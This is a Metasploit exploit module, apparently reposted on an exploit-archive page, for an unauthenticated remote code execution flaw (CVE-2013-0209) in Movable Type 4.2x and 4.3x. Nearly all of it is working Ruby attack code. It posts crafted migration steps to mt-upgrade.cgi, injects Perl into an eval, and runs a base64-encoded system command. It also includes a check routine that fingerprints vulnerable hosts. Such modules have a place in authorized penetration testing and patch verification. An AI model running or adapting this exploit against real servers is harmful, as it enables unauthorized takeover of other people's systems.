Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution



EKU-ID: 2980 CVE: 2013-0209 OSVDB-ID:
Author: Kacper Nowak Published: 2013-01-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

 include Exploit::Remote::HttpClient

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution',
   'Description'    => %q{
     This module can be used to execute a payload on MoveableType (MT) that
     exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi),
     that is used during installation and updating of the platform.
     The vulnerability arises due to the following properties:
     1. This script may be invoked remotely without requiring authentication
     to any MT instance.
     2. Through a crafted POST request, it is possible to invoke particular
     database migration functions (i.e functions that bring the existing
     database up-to-date with an updated codebase) by name and with
     particular parameters.
     3. A particular migration function, core_drop_meta_for_table, allows
     a class parameter to be set which is used directly in a perl eval
     statement, allowing perl code injection.
   },
   'Author'         =>
    [
     'Kacper Nowak',
     'Nick Blundell',
     'Gary O\'Leary-Steele'
    ],
   'References'     =>
    [
     ['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate)
     ['CVE', '2013-0209'],
     ['URL', 'http://www.sec-1.com/blog/?p=402'],
     ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html']
    ],
   'Arch'   => ARCH_CMD,
   'Payload'  =>
    {
     'Compat' =>
      {
       'PayloadType' => 'cmd'
      }
    },
   'Platform'  =>
    [
     'win',
     'unix'
    ],
   'Targets'  =>
    [
     ['Movable Type 4.2x, 4.3x', {}]
    ],
   'Privileged'  => false,
   'DisclosureDate' => "Jan 07 2013",
   'DefaultTarget'  => 0))

  register_options(
   [
    OptString.new('TARGETURI', [true, 'The URI path of the Movable Type installation', '/mt'])
   ], self.class)
 end

 def check
  @peer = "#{rhost}:#{rport}"
  fingerprint = rand_text_alpha(5)
  print_status("#{@peer} - Sending check...")
  begin
   res = http_send_raw(fingerprint)
  rescue Rex::ConnectionError
   return Exploit::CheckCode::Unknown
  end
  if (res)
   if (res.code == 200 and res.body =~ /Can't locate object method \\"dbi_driver\\" via package \\"#{fingerprint}\\" at/)
    return Exploit::CheckCode::Vulnerable
   elsif (res.code != 200)
    return Exploit::CheckCode::Unknown
   else
    return Exploit::CheckCode::Safe
   end
  else
   return Exploit::CheckCode::Unknown
  end
 end

 def exploit
  @peer = "#{rhost}:#{rport}"
  print_status("#{@peer} - Sending payload...")
  http_send_cmd(payload.encoded)
 end

 def http_send_raw(cmd)
  path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi'
  pay = cmd.gsub('\\', '\\\\').gsub('"', '\"')
  send_request_cgi(
   {
    'uri'       => path,
    'method'    => 'POST',
    'vars_post' =>
     {
      '__mode'     => 'run_actions',
      'installing' => '1',
      'steps'      => %{[["core_drop_meta_for_table","class","#{pay}"]]}
     }
   })
 end

 def http_send_cmd(cmd)
  pay = 'v0;use MIME::Base64;system(decode_base64(q('
  pay << Rex::Text.encode_base64(cmd)
  pay << ')));return 0'
  http_send_raw(pay)
 end
end